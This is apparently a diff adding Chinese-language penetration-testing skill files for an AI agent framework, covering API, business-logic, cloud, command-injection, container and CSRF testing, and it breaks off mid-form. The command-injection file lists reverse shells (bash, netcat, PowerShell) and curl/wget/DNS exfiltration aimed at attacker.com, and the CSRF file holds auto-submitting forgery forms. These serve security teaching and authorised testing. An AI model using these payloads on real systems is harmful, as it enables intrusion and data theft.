1. **加载阶段**:系统启动时,会扫描`skills_dir`目录下的所有skill目录
2. **执行阶段**:当使用某个角色执行任务时:
- 系统会将角色配置的skill名称添加到系统提示词中作为推荐提示
- **注意**:skill的详细内容不会自动注入到系统提示词中
- AI智能体需要根据任务需要,主动调用 `read_skill` 工具获取技能的详细内容
3. **按需调用**:AI可以通过以下工具访问skills:
- `list_skills`: 获取所有可用的skills列表
- `read_skill`: 读取指定skill的详细内容
这样AI可以在执行任务过程中,根据实际需要自主调用相关skills获取专业知识。即使角色没有配置skills,AI也可以通过这些工具按需访问任何可用的skill。
## 示例Skills
### sql-injection-testing
包含SQL注入测试的专业方法、工具使用、绕过技术等。
### xss-testing
包含XSS测试的各种类型、payload、绕过技术等。
## 创建自定义Skill
1.`skills`目录下创建新目录,例如`my-skill`
2. 在该目录下创建`SKILL.md`文件
3. 编写skill内容
4. 在角色配置中添加该skill名称
```bash
mkdir -p skills/my-skill
cat > skills/my-skill/SKILL.md << 'EOF'
---
name: my-skill
description: 我的自定义技能
---
# 我的自定义技能
这里是技能内容...
EOF
```
## 注意事项
- **重要**:Skill的详细内容不会自动注入到系统提示词中,只有技能名称会作为提示添加
- AI智能体需要通过 `read_skill` 工具主动获取技能内容,这样可以节省token并提高灵活性
- Skill内容应该清晰、结构化,便于AI理解
- 可以包含代码示例、命令示例等
- 建议每个skill专注于一个特定领域或技能
- 建议在skill的YAML front matter中提供清晰的 `description`,帮助AI判断是否需要读取该skill
## 配置
`config.yaml`中配置skills目录:
```yaml
skills_dir: skills # 相对于配置文件所在目录
```
如果未配置,默认使用`skills`目录。
+287
View File
@@ -0,0 +1,287 @@
---
name: api-security-testing
description: API安全测试的专业技能和方法论
version: 1.0.0
---
# API安全测试
## 概述
API安全测试是确保API接口安全性的重要环节。本技能提供API安全测试的方法、工具和最佳实践。
## 测试范围
### 1. 认证和授权
**测试项目:**
- Token有效性验证
- Token过期处理
- 权限控制
- 角色权限验证
### 2. 输入验证
**测试项目:**
- 参数类型验证
- 数据长度限制
- 特殊字符处理
- SQL注入防护
- XSS防护
### 3. 业务逻辑
**测试项目:**
- 工作流验证
- 状态转换
- 并发控制
- 业务规则
### 4. 错误处理
**测试项目:**
- 错误信息泄露
- 堆栈跟踪
- 敏感信息暴露
## 测试方法
### 1. API发现
**识别API端点:**
```bash
# 使用目录扫描
gobuster dir -u https://target.com -w api-wordlist.txt
# 使用Burp Suite被动扫描
# 浏览应用,观察API调用
# 分析JavaScript文件
# 查找API端点定义
```
### 2. 认证测试
**Token测试:**
```http
# Token
GET /api/user
Authorization: Bearer invalid_token
# Token
GET /api/user
Authorization: Bearer expired_token
# Token
GET /api/user
```
**JWT测试:**
```bash
# 使用jwt_tool
python jwt_tool.py <JWT_TOKEN>
# 测试算法混淆
python jwt_tool.py <JWT_TOKEN> -X a
# 测试密钥暴力破解
python jwt_tool.py <JWT_TOKEN> -C -d wordlist.txt
```
### 3. 授权测试
**水平权限:**
```http
# A访B
GET /api/user/123
Authorization: Bearer user_a_token
# 403
```
**垂直权限:**
```http
# 访
GET /api/admin/users
Authorization: Bearer user_token
# 403
```
### 4. 输入验证测试
**SQL注入:**
```http
POST /api/search
{
"query": "test' OR '1'='1"
}
```
**命令注入:**
```http
POST /api/execute
{
"command": "ping; id"
}
```
**XXE**
```http
POST /api/parse
Content-Type: application/xml
<?xml version="1.0"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<foo>&xxe;</foo>
```
### 5. 速率限制测试
**测试速率限制:**
```python
import requests
for i in range(1000):
response = requests.get('https://target.com/api/endpoint')
print(f"Request {i}: {response.status_code}")
```
## 工具使用
### Postman
**创建测试集合:**
1. 导入API文档
2. 设置认证
3. 创建测试用例
4. 运行自动化测试
### Burp Suite
**API扫描:**
1. 配置API端点
2. 设置认证
3. 运行主动扫描
4. 分析结果
### OWASP ZAP
```bash
# API扫描
zap-cli quick-scan --self-contained \
--start-options '-config api.disablekey=true' \
http://target.com/api
```
### REST-Attacker
```bash
# 扫描OpenAPI规范
rest-attacker scan openapi.yaml
```
## 常见漏洞
### 1. 认证绕过
**Token验证缺陷:**
- 弱Token生成
- Token可预测
- Token不验证签名
### 2. 权限提升
**IDOR**
- 直接对象引用
- 未验证资源所有权
### 3. 信息泄露
**错误信息:**
- 详细错误信息
- 堆栈跟踪
- 敏感数据
### 4. 注入漏洞
**常见注入:**
- SQL注入
- NoSQL注入
- 命令注入
- XXE
### 5. 业务逻辑
**逻辑缺陷:**
- 价格操作
- 数量限制绕过
- 状态修改
## 测试清单
### 认证测试
- [ ] Token有效性验证
- [ ] Token过期处理
- [ ] 弱Token检测
- [ ] Token重放攻击
### 授权测试
- [ ] 水平权限测试
- [ ] 垂直权限测试
- [ ] 角色权限验证
- [ ] 资源访问控制
### 输入验证
- [ ] SQL注入测试
- [ ] XSS测试
- [ ] 命令注入测试
- [ ] XXE测试
- [ ] 参数污染
### 业务逻辑
- [ ] 工作流验证
- [ ] 状态转换
- [ ] 并发控制
- [ ] 业务规则
### 错误处理
- [ ] 错误信息泄露
- [ ] 堆栈跟踪
- [ ] 敏感信息暴露
## 防护措施
### 推荐方案
1. **认证**
- 使用强Token
- 实现Token刷新
- 验证Token签名
2. **授权**
- 基于角色的访问控制
- 资源所有权验证
- 最小权限原则
3. **输入验证**
- 参数类型验证
- 数据长度限制
- 白名单验证
4. **错误处理**
- 统一错误响应
- 不泄露详细信息
- 记录错误日志
5. **速率限制**
- 实现API限流
- 防止暴力破解
- 监控异常请求
## 注意事项
- 仅在授权测试环境中进行
- 避免对API造成影响
- 注意不同API版本的差异
- 测试时注意请求频率
+402
View File
@@ -0,0 +1,402 @@
---
name: business-logic-testing
description: 业务逻辑漏洞测试的专业技能和方法论
version: 1.0.0
---
# 业务逻辑漏洞测试
## 概述
业务逻辑漏洞是应用程序在业务处理流程中的设计缺陷,可能导致未授权操作、数据篡改、资金损失等。本技能提供业务逻辑漏洞的检测、利用和防护方法。
## 漏洞类型
### 1. 工作流绕过
**跳过验证步骤:**
- 直接访问最终步骤
- 修改步骤顺序
- 重复执行步骤
### 2. 价格操作
**负数价格:**
- 输入负数金额
- 导致账户余额增加
**价格篡改:**
- 修改前端价格
- 修改API请求中的价格
### 3. 数量限制绕过
**负数数量:**
- 输入负数
- 可能导致库存增加
**超出限制:**
- 修改数量限制
- 批量操作绕过
### 4. 时间竞争
**并发请求:**
- 同时发送多个请求
- 绕过单次限制
### 5. 状态操作
**状态回退:**
- 将已完成订单改为待支付
- 修改订单状态
## 测试方法
### 1. 工作流分析
**识别业务流程:**
- 注册流程
- 购买流程
- 提现流程
- 审核流程
**测试步骤跳过:**
```
正常流程: 步骤1 → 步骤2 → 步骤3
测试: 直接访问步骤3
测试: 步骤1 → 步骤3(跳过步骤2)
```
### 2. 参数篡改
**修改关键参数:**
```http
POST /api/purchase
{
"product_id": 123,
"quantity": 1,
"price": 100.00 # 0.01
}
```
**负数测试:**
```json
{
"quantity": -1,
"price": -100.00
}
```
### 3. 并发测试
**同时发送请求:**
```python
import threading
import requests
def purchase():
requests.post('https://target.com/api/purchase',
json={'product_id': 123, 'quantity': 1})
# 同时发送10个请求
for i in range(10):
threading.Thread(target=purchase).start()
```
### 4. 状态修改
**修改订单状态:**
```http
PATCH /api/order/123
{
"status": "completed" #
}
```
**回退状态:**
```http
PATCH /api/order/123
{
"status": "pending" # 退
}
```
## 利用技术
### 价格操作
**负数价格:**
```json
{
"product_id": 123,
"price": -100.00,
"quantity": 1
}
```
**修改前端价格:**
```javascript
// 前端代码
const price = 100.00;
// 修改为
const price = 0.01;
```
**API价格修改:**
```http
POST /api/checkout
{
"items": [
{
"product_id": 123,
"price": 0.01, # 100.00
"quantity": 1
}
]
}
```
### 数量限制绕过
**负数数量:**
```json
{
"product_id": 123,
"quantity": -10 #
}
```
**超出限制:**
```json
{
"product_id": 123,
"quantity": 999999 #
}
```
### 优惠券滥用
**重复使用:**
```http
POST /api/checkout
{
"coupon": "DISCOUNT50",
"items": [...]
}
# 使
```
**未激活优惠券:**
```http
POST /api/checkout
{
"coupon": "EXPIRED_COUPON", # 使
"items": [...]
}
```
### 提现漏洞
**负数提现:**
```json
{
"amount": -1000.00 #
}
```
**超出余额:**
```json
{
"amount": 999999.00 #
}
```
### 时间竞争
**并发购买:**
```python
import threading
import requests
def buy():
requests.post('https://target.com/api/purchase',
json={'product_id': 123, 'quantity': 1})
# 限时抢购,并发请求
for i in range(100):
threading.Thread(target=buy).start()
```
## 绕过技术
### 前端验证绕过
**直接调用API**
- 绕过前端JavaScript验证
- 直接发送API请求
**修改请求:**
- 使用Burp Suite拦截
- 修改参数后发送
### 状态码分析
**观察响应:**
- 200 OK - 可能成功
- 400 Bad Request - 参数错误
- 403 Forbidden - 权限不足
- 500 Internal Server Error - 服务器错误
### 错误信息利用
**从错误信息获取信息:**
```
错误: "余额不足,当前余额: 100.00"
→ 可以获取账户余额信息
```
## 工具使用
### Burp Suite
**使用Repeater**
1. 拦截业务请求
2. 修改关键参数
3. 观察响应
**使用Intruder**
1. 标记参数
2. 使用Payload列表
3. 批量测试
### 自定义脚本
```python
import requests
import json
def test_price_manipulation():
# 测试价格修改
for price in [0.01, -100, 0, 999999]:
data = {
"product_id": 123,
"price": price,
"quantity": 1
}
response = requests.post('https://target.com/api/purchase',
json=data)
print(f"Price {price}: {response.status_code}")
test_price_manipulation()
```
## 验证和报告
### 验证步骤
1. 确认可以绕过业务逻辑限制
2. 验证可以执行未授权操作
3. 评估影响(资金损失、数据篡改等)
4. 记录完整的POC
### 报告要点
- 漏洞位置和业务流程
- 可执行的未授权操作
- 完整的利用步骤和PoC
- 修复建议(服务端验证、业务规则检查等)
## 防护措施
### 推荐方案
1. **服务端验证**
```python
def process_purchase(product_id, quantity, price):
# 从数据库获取真实价格
real_price = db.get_product_price(product_id)
# 验证价格
if price != real_price:
raise ValueError("Price mismatch")
# 验证数量
if quantity <= 0:
raise ValueError("Invalid quantity")
# 处理购买
process_order(product_id, quantity, real_price)
```
2. **状态机验证**
```python
class OrderState:
PENDING = "pending"
PAID = "paid"
SHIPPED = "shipped"
COMPLETED = "completed"
TRANSITIONS = {
PENDING: [PAID],
PAID: [SHIPPED],
SHIPPED: [COMPLETED]
}
def can_transition(self, from_state, to_state):
return to_state in self.TRANSITIONS.get(from_state, [])
```
3. **并发控制**
```python
import threading
lock = threading.Lock()
def process_order(order_id):
with lock:
# 检查订单状态
order = db.get_order(order_id)
if order.status != 'pending':
raise ValueError("Order already processed")
# 处理订单
process(order)
```
4. **业务规则验证**
```python
def validate_business_rules(order):
# 验证数量限制
if order.quantity > MAX_QUANTITY:
raise ValueError("Quantity exceeds limit")
# 验证价格范围
if order.price <= 0:
raise ValueError("Invalid price")
# 验证库存
if order.quantity > get_stock(order.product_id):
raise ValueError("Insufficient stock")
```
5. **审计日志**
```python
def log_business_action(user_id, action, details):
log_entry = {
"user_id": user_id,
"action": action,
"details": details,
"timestamp": datetime.now()
}
db.log_action(log_entry)
```
## 注意事项
- 仅在授权测试环境中进行
- 避免对业务造成实际影响
- 注意不同业务流程的差异
- 测试时注意数据一致性
+343
View File
@@ -0,0 +1,343 @@
---
name: cloud-security-audit
description: 云安全审计的专业技能和方法论
version: 1.0.0
---
# 云安全审计
## 概述
云安全审计是评估云环境安全性的重要环节。本技能提供云安全审计的方法、工具和最佳实践,涵盖AWS、Azure、GCP等主流云平台。
## 审计范围
### 1. 身份和访问管理
**检查项目:**
- IAM策略配置
- 用户权限
- 角色权限
- 访问密钥管理
### 2. 网络安全
**检查项目:**
- 安全组配置
- 网络ACL
- VPC配置
- 流量加密
### 3. 数据安全
**检查项目:**
- 数据加密
- 密钥管理
- 备份策略
- 数据分类
### 4. 合规性
**检查项目:**
- 合规框架
- 审计日志
- 监控告警
- 事件响应
## AWS安全审计
### IAM审计
**检查IAM策略:**
```bash
# 列出所有IAM用户
aws iam list-users
# 列出所有IAM策略
aws iam list-policies
# 检查用户权限
aws iam list-user-policies --user-name username
aws iam list-attached-user-policies --user-name username
# 检查角色权限
aws iam list-role-policies --role-name rolename
```
**常见问题:**
- 过度权限
- 未使用的访问密钥
- 密码策略弱
- MFA未启用
### S3安全审计
**检查S3存储桶:**
```bash
# 列出所有存储桶
aws s3 ls
# 检查存储桶策略
aws s3api get-bucket-policy --bucket bucketname
# 检查存储桶ACL
aws s3api get-bucket-acl --bucket bucketname
# 检查存储桶加密
aws s3api get-bucket-encryption --bucket bucketname
```
**常见问题:**
- 公开访问
- 未加密
- 版本控制未启用
- 日志记录未启用
### 安全组审计
**检查安全组:**
```bash
# 列出所有安全组
aws ec2 describe-security-groups
# 检查开放端口
aws ec2 describe-security-groups --group-ids sg-xxx
```
**常见问题:**
- 0.0.0.0/0开放
- 不必要的端口开放
- 规则过于宽松
### CloudTrail审计
**检查审计日志:**
```bash
# 列出所有跟踪
aws cloudtrail describe-trails
# 检查日志文件完整性
aws cloudtrail get-trail-status --name trailname
```
## Azure安全审计
### 订阅和资源组
**检查订阅:**
```bash
# 列出所有订阅
az account list
# 检查资源组
az group list
```
### 网络安全组
**检查NSG**
```bash
# 列出所有NSG
az network nsg list
# 检查NSG规则
az network nsg rule list --nsg-name nsgname --resource-group rgname
```
### 存储账户
**检查存储账户:**
```bash
# 列出所有存储账户
az storage account list
# 检查访问策略
az storage account show --name accountname --resource-group rgname
```
## GCP安全审计
### 项目和组织
**检查项目:**
```bash
# 列出所有项目
gcloud projects list
# 检查IAM策略
gcloud projects get-iam-policy project-id
```
### 计算引擎
**检查实例:**
```bash
# 列出所有实例
gcloud compute instances list
# 检查防火墙规则
gcloud compute firewall-rules list
```
### 存储
**检查存储桶:**
```bash
# 列出所有存储桶
gsutil ls
# 检查存储桶权限
gsutil iam get gs://bucketname
```
## 自动化工具
### Scout Suite
```bash
# AWS审计
scout aws
# Azure审计
scout azure
# GCP审计
scout gcp
```
### Prowler
```bash
# AWS安全审计
prowler -c check11,check12,check13
# 完整审计
prowler
```
### CloudSploit
```bash
# 扫描AWS账户
cloudsploit scan aws
# 扫描Azure订阅
cloudsploit scan azure
```
### Pacu
```bash
# AWS渗透测试框架
pacu
```
## 审计清单
### IAM安全
- [ ] 检查用户权限
- [ ] 检查角色权限
- [ ] 检查访问密钥
- [ ] 检查密码策略
- [ ] 检查MFA启用情况
### 网络安全
- [ ] 检查安全组/NSG规则
- [ ] 检查VPC配置
- [ ] 检查网络ACL
- [ ] 检查流量加密
### 数据安全
- [ ] 检查数据加密
- [ ] 检查密钥管理
- [ ] 检查备份策略
- [ ] 检查数据分类
### 合规性
- [ ] 检查审计日志
- [ ] 检查监控告警
- [ ] 检查事件响应
- [ ] 检查合规框架
## 常见安全问题
### 1. 过度权限
**问题:**
- IAM策略过于宽松
- 用户拥有管理员权限
- 角色权限过大
**修复:**
- 最小权限原则
- 定期审查权限
- 使用IAM策略模拟
### 2. 公开资源
**问题:**
- S3存储桶公开
- 安全组开放0.0.0.0/0
- 数据库公开访问
**修复:**
- 限制访问范围
- 使用私有网络
- 启用访问控制
### 3. 未加密数据
**问题:**
- 存储未加密
- 传输未加密
- 密钥管理不当
**修复:**
- 启用加密
- 使用TLS/SSL
- 使用密钥管理服务
### 4. 日志缺失
**问题:**
- 未启用审计日志
- 日志未保留
- 日志未监控
**修复:**
- 启用CloudTrail/Azure Monitor
- 设置日志保留策略
- 配置监控告警
## 最佳实践
### 1. 最小权限
- 只授予必要权限
- 定期审查权限
- 使用IAM策略模拟
### 2. 多层防护
- 网络层防护
- 应用层防护
- 数据层防护
### 3. 监控和告警
- 启用审计日志
- 配置监控告警
- 建立事件响应流程
### 4. 合规性
- 遵循合规框架
- 定期安全审计
- 文档化安全策略
## 注意事项
- 仅在授权环境中进行审计
- 避免对生产环境造成影响
- 注意不同云平台的差异
- 定期进行安全审计
+302
View File
@@ -0,0 +1,302 @@
---
name: command-injection-testing
description: 命令注入漏洞测试的专业技能和方法论
version: 1.0.0
---
# 命令注入漏洞测试
## 概述
命令注入是一种通过应用程序执行系统命令的漏洞。当应用程序将用户输入直接传递给系统命令时,攻击者可以执行任意命令。本技能提供命令注入的检测、利用和防护方法。
## 漏洞原理
应用程序调用系统命令时,未对用户输入进行充分验证和过滤,导致攻击者可以注入额外的命令。
**危险代码示例:**
```php
// PHP
system("ping " . $_GET['ip']);
// Python
os.system("ping " + user_input)
// Node.js
child_process.exec("ping " + user_input)
```
## 测试方法
### 1. 识别命令执行点
**常见功能:**
- Ping功能
- DNS查询
- 文件操作
- 系统信息
- 日志查看
- 备份恢复
### 2. 基础检测
**测试命令分隔符:**
```
; # 命令分隔符(Linux/Windows
& # 后台执行(Linux/Windows
| # 管道符(Linux/Windows
&& # 逻辑与(Linux/Windows
|| # 逻辑或(Linux/Windows
` # 命令替换(Linux
$() # 命令替换(Linux
```
**测试Payload**
```
127.0.0.1; id
127.0.0.1 && whoami
127.0.0.1 | cat /etc/passwd
127.0.0.1 `whoami`
127.0.0.1 $(whoami)
```
### 3. 盲命令注入
**时间延迟检测:**
```
127.0.0.1; sleep 5
127.0.0.1 && sleep 5
127.0.0.1 | sleep 5
```
**外带数据:**
```
127.0.0.1; curl http://attacker.com/?$(whoami)
127.0.0.1 && wget http://attacker.com/$(cat /etc/passwd)
```
**DNS外带:**
```
127.0.0.1; nslookup $(whoami).attacker.com
```
## 利用技术
### 基础命令执行
**Linux**
```
; id
; whoami
; uname -a
; cat /etc/passwd
; ls -la
```
**Windows**
```
& whoami
& ipconfig
& type C:\Windows\System32\drivers\etc\hosts
& dir
```
### 文件操作
**读取文件:**
```
; cat /etc/passwd
; type C:\Windows\System32\config\sam
; head -n 20 /var/log/apache2/access.log
```
**写入文件:**
```
; echo "<?php phpinfo(); ?>" > /tmp/shell.php
; echo "test" > C:\temp\test.txt
```
### 反弹Shell
**Bash**
```
; bash -i >& /dev/tcp/attacker.com/4444 0>&1
```
**Netcat**
```
; nc -e /bin/bash attacker.com 4444
; rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc attacker.com 4444 >/tmp/f
```
**PowerShell**
```
& powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('attacker.com',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
```
## 绕过技术
### 空格绕过
```
${IFS}id
${IFS}whoami
$IFS$9id
<>
%09 (Tab)
%20 (Space)
```
### 命令分隔符绕过
**编码绕过:**
```
%3b (;)
%26 (&)
%7c (|)
```
**换行绕过:**
```
%0a (换行)
%0d (回车)
```
### 关键字过滤绕过
**变量拼接:**
```bash
a=w;b=ho;c=ami;$a$b$c
```
**通配符:**
```bash
/bin/c?t /etc/passwd
/usr/bin/ca* /etc/passwd
```
**引号绕过:**
```bash
w'h'o'a'm'i
w"h"o"a"m"i
```
**反斜杠:**
```bash
w\ho\am\i
```
**Base64编码:**
```bash
echo "d2hvYW1p" | base64 -d | bash
```
### 长度限制绕过
**使用文件:**
```bash
echo "id" > /tmp/c
sh /tmp/c
```
**使用环境变量:**
```bash
export x='id';$x
```
## 工具使用
### Commix
```bash
# 基础扫描
python commix.py -u "http://target.com/ping?ip=127.0.0.1"
# 指定注入点
python commix.py -u "http://target.com/ping?ip=INJECT_HERE" --data="ip=INJECT_HERE"
# 获取Shell
python commix.py -u "http://target.com/ping?ip=127.0.0.1" --os-shell
```
### Burp Suite
1. 拦截请求
2. 发送到Intruder
3. 使用命令注入Payload列表
4. 观察响应或时间延迟
## 验证和报告
### 验证步骤
1. 确认可以执行系统命令
2. 验证命令执行结果
3. 评估影响(系统控制、数据泄露等)
4. 记录完整的POC
### 报告要点
- 漏洞位置和输入参数
- 可执行的命令类型
- 完整的利用步骤和POC
- 修复建议(输入验证、参数化、白名单等)
## 防护措施
### 推荐方案
1. **避免命令执行**
- 使用API替代系统命令
- 使用库函数替代命令
2. **输入验证**
```python
import re
def validate_ip(ip):
pattern = r'^(\d{1,3}\.){3}\d{1,3}$'
if not re.match(pattern, ip):
raise ValueError("Invalid IP")
parts = ip.split('.')
if not all(0 <= int(p) <= 255 for p in parts):
raise ValueError("Invalid IP range")
return ip
```
3. **参数化命令**
```python
import subprocess
# 危险
subprocess.call(['ping', '-c', '1', user_input])
# 安全 - 使用参数列表
subprocess.call(['ping', '-c', '1', validated_ip])
```
4. **白名单验证**
```python
ALLOWED_COMMANDS = ['ping', 'nslookup']
ALLOWED_OPTIONS = {'ping': ['-c', '-n']}
if command not in ALLOWED_COMMANDS:
raise ValueError("Command not allowed")
```
5. **最小权限**
- 使用低权限用户运行应用
- 限制文件系统访问
- 使用chroot或容器隔离
6. **输出过滤**
- 限制输出内容
- 过滤敏感信息
- 记录命令执行日志
## 注意事项
- 仅在授权测试环境中进行
- 避免对系统造成破坏
- 注意不同操作系统的命令差异
- 测试时注意命令执行的影响范围
+377
View File
@@ -0,0 +1,377 @@
---
name: container-security-testing
description: 容器安全测试的专业技能和方法论
version: 1.0.0
---
# 容器安全测试
## 概述
容器安全测试是确保容器化应用安全性的重要环节。本技能提供容器安全测试的方法、工具和最佳实践,涵盖Docker、Kubernetes等容器技术。
## 测试范围
### 1. 镜像安全
**检查项目:**
- 基础镜像漏洞
- 依赖包漏洞
- 镜像配置
- 敏感信息
### 2. 运行时安全
**检查项目:**
- 容器权限
- 资源限制
- 网络隔离
- 文件系统
### 3. 编排安全
**检查项目:**
- Kubernetes配置
- 服务账户
- RBAC
- 网络策略
## Docker安全测试
### 镜像扫描
**使用Trivy**
```bash
# 扫描镜像
trivy image nginx:latest
# 扫描本地镜像
trivy image --input nginx.tar
# 只显示高危漏洞
trivy image --severity HIGH,CRITICAL nginx:latest
```
**使用Clair**
```bash
# 启动Clair
docker run -d --name clair clair:latest
# 扫描镜像
clair-scanner --ip 192.168.1.100 nginx:latest
```
**使用Docker Bench**
```bash
# 运行Docker安全基准测试
docker run --rm --net host --pid host --userns host --cap-add audit_control \
-e DOCKER_CONTENT_TRUST=$DOCKER_CONTENT_TRUST \
-v /etc:/etc:ro \
-v /usr/bin/containerd:/usr/bin/containerd:ro \
-v /usr/bin/runc:/usr/bin/runc:ro \
-v /usr/lib/systemd:/usr/lib/systemd:ro \
-v /var/lib:/var/lib:ro \
-v /var/run/docker.sock:/var/run/docker.sock:ro \
--label docker_bench_security \
docker/docker-bench-security
```
### 容器配置检查
**检查Dockerfile**
```dockerfile
# 安全问题示例
FROM ubuntu:latest # 使用latest标签
RUN apt-get update && apt-get install -y curl # 未指定版本
COPY . /app # 可能包含敏感文件
ENV PASSWORD=secret # 硬编码密码
USER root # 使用root用户
```
**安全最佳实践:**
```dockerfile
# 使用特定版本
FROM ubuntu:20.04
# 指定包版本
RUN apt-get update && apt-get install -y curl=7.68.0-1ubuntu2.7
# 使用非root用户
RUN useradd -m appuser
USER appuser
# 最小化镜像
FROM alpine:3.15
# 多阶段构建
FROM golang:1.18 AS builder
WORKDIR /app
COPY . .
RUN go build -o app
FROM alpine:3.15
COPY --from=builder /app/app /app
```
### 运行时检查
**检查容器权限:**
```bash
# 检查特权容器
docker ps --filter "label=privileged=true"
# 检查挂载的主机目录
docker inspect container_name | grep -A 10 Mounts
# 检查容器网络
docker network inspect network_name
```
**检查资源限制:**
```bash
# 检查内存限制
docker stats container_name
# 检查CPU限制
docker inspect container_name | grep -i cpu
```
## Kubernetes安全测试
### 配置检查
**使用kube-bench**
```bash
# 运行kube-bench
kube-bench run
# 检查特定基准
kube-bench run --targets master,node,etcd
```
**使用kube-hunter**
```bash
# 运行kube-hunter
kube-hunter --remote target-ip
# 主动模式
kube-hunter --active
```
### Pod安全
**检查Pod安全策略:**
```yaml
# 不安全的Pod配置
apiVersion: v1
kind: Pod
spec:
containers:
- name: app
image: nginx
securityContext:
privileged: true # 特权模式
runAsUser: 0 # root用户
```
**安全配置:**
```yaml
apiVersion: v1
kind: Pod
spec:
securityContext:
runAsNonRoot: true
runAsUser: 1000
fsGroup: 2000
containers:
- name: app
image: nginx
securityContext:
allowPrivilegeEscalation: false
readOnlyRootFilesystem: true
capabilities:
drop:
- ALL
add:
- NET_BIND_SERVICE
```
### RBAC检查
**检查角色权限:**
```bash
# 列出所有角色
kubectl get roles --all-namespaces
# 检查角色绑定
kubectl get rolebindings --all-namespaces
# 检查集群角色
kubectl get clusterroles
# 检查用户权限
kubectl auth can-i --list --as=system:serviceaccount:default:sa-name
```
**常见问题:**
- 过度权限
- 未使用的角色
- 未使用的服务账户
### 网络策略
**检查网络策略:**
```bash
# 列出所有网络策略
kubectl get networkpolicies --all-namespaces
# 检查网络策略配置
kubectl describe networkpolicy policy-name -n namespace
```
**网络策略示例:**
```yaml
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
name: default-deny
spec:
podSelector: {}
policyTypes:
- Ingress
- Egress
```
## 工具使用
### Falco
**运行时安全监控:**
```bash
# 安装Falco
helm repo add falcosecurity https://falcosecurity.github.io/charts
helm install falco falcosecurity/falco
# 检查规则
falco -r /etc/falco/rules.d/
```
### Aqua Security
```bash
# 扫描镜像
aqua image scan nginx:latest
# 扫描Kubernetes集群
aqua k8s scan
```
### Snyk
```bash
# 扫描Dockerfile
snyk test --docker nginx:latest
# 扫描Kubernetes配置
snyk iac test k8s/
```
## 测试清单
### 镜像安全
- [ ] 扫描基础镜像漏洞
- [ ] 扫描依赖包漏洞
- [ ] 检查Dockerfile配置
- [ ] 检查敏感信息泄露
### 运行时安全
- [ ] 检查容器权限
- [ ] 检查资源限制
- [ ] 检查网络隔离
- [ ] 检查文件系统挂载
### 编排安全
- [ ] 检查Kubernetes配置
- [ ] 检查RBAC配置
- [ ] 检查网络策略
- [ ] 检查Pod安全策略
## 常见安全问题
### 1. 镜像漏洞
**问题:**
- 基础镜像包含漏洞
- 依赖包包含漏洞
- 未及时更新
**修复:**
- 定期扫描镜像
- 及时更新基础镜像
- 使用最小化镜像
### 2. 过度权限
**问题:**
- 容器以root运行
- 特权模式
- 挂载敏感目录
**修复:**
- 使用非root用户
- 禁用特权模式
- 限制文件系统访问
### 3. 配置错误
**问题:**
- 默认配置不安全
- 网络策略缺失
- RBAC配置错误
**修复:**
- 遵循安全最佳实践
- 实施网络策略
- 正确配置RBAC
### 4. 敏感信息泄露
**问题:**
- 镜像包含密钥
- 环境变量暴露
- 配置文件泄露
**修复:**
- 使用密钥管理
- 避免硬编码
- 使用Secret对象
## 最佳实践
### 1. 镜像安全
- 使用官方基础镜像
- 定期更新镜像
- 扫描镜像漏洞
- 最小化镜像大小
### 2. 运行时安全
- 使用非root用户
- 限制容器权限
- 实施资源限制
- 启用安全上下文
### 3. 编排安全
- 配置网络策略
- 实施RBAC
- 使用Pod安全策略
- 启用审计日志
## 注意事项
- 仅在授权环境中进行测试
- 避免对生产环境造成影响
- 注意不同容器平台的差异
- 定期进行安全扫描
+199
View File
@@ -0,0 +1,199 @@
---
name: csrf-testing
description: CSRF跨站请求伪造测试的专业技能和方法论
version: 1.0.0
---
# CSRF跨站请求伪造测试
## 概述
CSRFCross-Site Request Forgery)是一种利用用户已登录状态进行未授权操作的攻击方式。本技能提供CSRF漏洞的检测、利用和防护方法。
## 漏洞原理
- 攻击者诱导用户访问恶意页面
- 恶意页面自动发送请求到目标网站
- 浏览器自动携带用户的认证信息(Cookie、Session
- 目标网站误认为是用户合法操作
## 测试方法
### 1. 识别敏感操作
- 密码修改
- 邮箱修改
- 转账操作
- 权限变更
- 数据删除
- 状态更新
### 2. 检测CSRF Token
**检查是否有Token保护:**
```html
<!-- 有Token保护 -->
<form method="POST" action="/change-password">
<input type="hidden" name="csrf_token" value="abc123">
<input type="password" name="new_password">
</form>
<!-- 无Token保护 - 存在CSRF风险 -->
<form method="POST" action="/change-email">
<input type="email" name="new_email">
</form>
```
### 3. 验证Token有效性
**测试Token是否可预测:**
- Token是否基于时间戳
- Token是否基于用户ID
- Token是否可重复使用
- Token是否在多个请求间共享
### 4. 检查Referer验证
**测试Referer检查是否可绕过:**
```javascript
// 正常请求
Referer: https://target.com/change-password
// 测试绕过
Referer: https://target.com.evil.com
Referer: https://evil.com/?target.com
Referer: ()
```
## 利用技术
### 基础CSRF攻击
**HTML表单自动提交:**
```html
<form action="https://target.com/api/transfer" method="POST" id="csrf">
<input type="hidden" name="to" value="attacker_account">
<input type="hidden" name="amount" value="10000">
</form>
<script>document.getElementById('csrf').submit();</script>
```
### JSON CSRF
**绕过Content-Type检查:**
```html
<!-- 使用form表单提交JSON -->
<form action="https://target.com/api/update" method="POST" enctype="text/plain">
<input name='{"email":"attacker@evil.com","ignore":"' value='"}'>
</form>
<script>document.forms[0].submit();</script>
```
### GET请求CSRF
**利用GET请求进行攻击:**
```html
<img src="https://target.com/api/delete?id=123">
```
## 绕过技术
### Token绕过
**如果Token在Cookie中:**
```javascript
// 如果Token同时存在于Cookie和表单中
// 可以尝试只提交Cookie中的Token
fetch('https://target.com/api/action', {
method: 'POST',
credentials: 'include',
body: 'action=delete&id=123'
// 不包含csrf_token参数,依赖Cookie
});
```
### SameSite Cookie绕过
**利用子域名:**
- 如果SameSite=LaxGET请求仍可携带Cookie
- 利用子域名进行攻击
### 双重提交Cookie
**绕过Token验证:**
```html
<!-- 如果Token在Cookie中,且验证逻辑有缺陷 -->
<form action="https://target.com/api/action" method="POST">
